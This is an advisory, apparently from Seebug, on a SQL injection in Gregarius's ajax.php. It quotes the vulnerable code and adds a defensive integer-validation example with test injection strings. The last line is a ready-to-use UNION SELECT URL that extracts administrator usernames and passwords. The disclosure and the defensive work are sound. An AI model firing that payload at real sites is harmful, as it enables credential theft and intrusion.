Gregarius ajax.php SQL Injection Vulnerability

2008-07-31T00:00:00
ID SSV:3743
Type seebug
Reporter Root
Modified 2008-07-31T00:00:00

Description

BUGTRAQ ID: 30423

Gregarius is a PHP-based RSS aggregator that collects the configured feeds together and outputs them as HTML or XML.

The /ajax.php file in Gregarius contains multiple SQL injection vulnerabilities that allow a remote attacker to obtain administrator credentials without authentication. The vulnerable code segment is as follows:

    function __exp__getFeedContent($cid) {
        ob_start();
        rss_require('cls/items.php');

        $readItems = new ItemList();

        // $cid is interpolated into the SQL WHERE clause without validation
        // or quoting: this is the injection point.
        $readItems->populate(" not(i.unread & " . RSS_MODE_UNREAD_STATE . ")
            and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
        $readItems->setTitle(LBL_H2_RECENT_ITEMS);
        $readItems->setRenderOptions(IL_TITLE_NO_ESCAPE);
        foreach ($readItems->feeds[0]->items as $item) {
            $item->render();
        }
        $c = ob_get_contents();
        ob_end_clean();
        // The unvalidated value is also echoed back in the response.
        return "$cid|@|$c";
    }

sajax_handle_client_request() calls the function above and lets an attacker supply the value of $cid through the rsargs[] array. Because the value is used in a numeric context, no quote character is needed, so the query can be affected regardless of the magic_quotes_gpc setting.
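As an added example (not Gregarius's own code or fix), the following PHP shows the defensive pattern that closes this hole: a feed id that reaches an SQL string is validated as a non-negative integer before interpolation, and anything else is refused. The function validateFeedId() is a hypothetical helper introduced here; ItemList, rss_require() and the constants are assumed to exist exactly as in the vulnerable snippet above. The self-check at the bottom exercises only the validator, on constructed inputs, so it runs without Gregarius installed.

```php
<?php
// Added example, not Gregarius's own fix. Demonstrates the defensive pattern
// for the snippet above: a feed id that is interpolated into SQL must be
// validated as an integer first. magic_quotes_gpc does not help in a numeric
// context, because the injected text never needs a quote character.

// Hypothetical validator: accepts only a non-negative decimal integer of
// reasonable length and returns it as a PHP int, or null for anything else.
function validateFeedId($raw)
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = (string) $raw;
    // ctype_digit() rejects "-99 UNION SELECT ...", "1 OR 1=1", "", "1.0", ...
    if ($s === '' || !ctype_digit($s) || strlen($s) > 10) {
        return null;
    }
    return (int) $s;
}

// Hardened counterpart of __exp__getFeedContent(). Same rendering logic,
// but the id is validated before it can touch the query string.
function getFeedContentSafe($cid)
{
    $id = validateFeedId($cid);
    if ($id === null) {
        // Refuse rather than guess; the sajax caller receives an empty response.
        return '';
    }
    ob_start();
    rss_require('cls/items.php');
    $readItems = new ItemList();
    // $id is a PHP int here, so the interpolated text can only be digits.
    $readItems->populate(" not(i.unread & " . RSS_MODE_UNREAD_STATE . ")
        and i.cid = $id", "", 0, 2, ITEM_SORT_HINT_READ);
    $readItems->setTitle(LBL_H2_RECENT_ITEMS);
    $readItems->setRenderOptions(IL_TITLE_NO_ESCAPE);
    foreach ($readItems->feeds[0]->items as $item) {
        $item->render();
    }
    $c = ob_get_contents();
    ob_end_clean();
    return "$id|@|$c";
}

// Self-check of the validator on constructed inputs (no Gregarius needed).
// Note: PHP turns the key '42' into the int 42, which the validator must
// also accept, since rsargs[] values may already have been cast.
$cases = [
    '42'                          => 42,
    '-99 UNION SELECT 1,2 FROM t' => null,
    '1 OR 1=1'                    => null,
    '7; DROP TABLE users'         => null,
    ''                            => null,
];
foreach ($cases as $input => $expected) {
    $got = validateFeedId($input);
    echo var_export($input, true), ' => ', var_export($got, true),
         ($got === $expected ? '  ok' : '  MISMATCH'), PHP_EOL;
}
```

Validating to an int is the minimal fix for a purely numeric parameter; where the application's database layer supports it, binding $id as a parameter in a prepared statement gives the same guarantee without relying on string interpolation at all.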

Vendor: Marco Bonetti
Affected versions: Gregarius <= 0.5.4
Credit: James Bercegay (security@gulftech.org)

References:
http://marc.info/?l=bugtraq&m=121734846209080&w=2
http://secunia.com/advisories/31260/

                                        
                                            
                                                http://www.example.com/ajax.php?rs=__exp__getFeedContent&amp;amp;rsargs[]=-99 UNION SELECT concat(char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*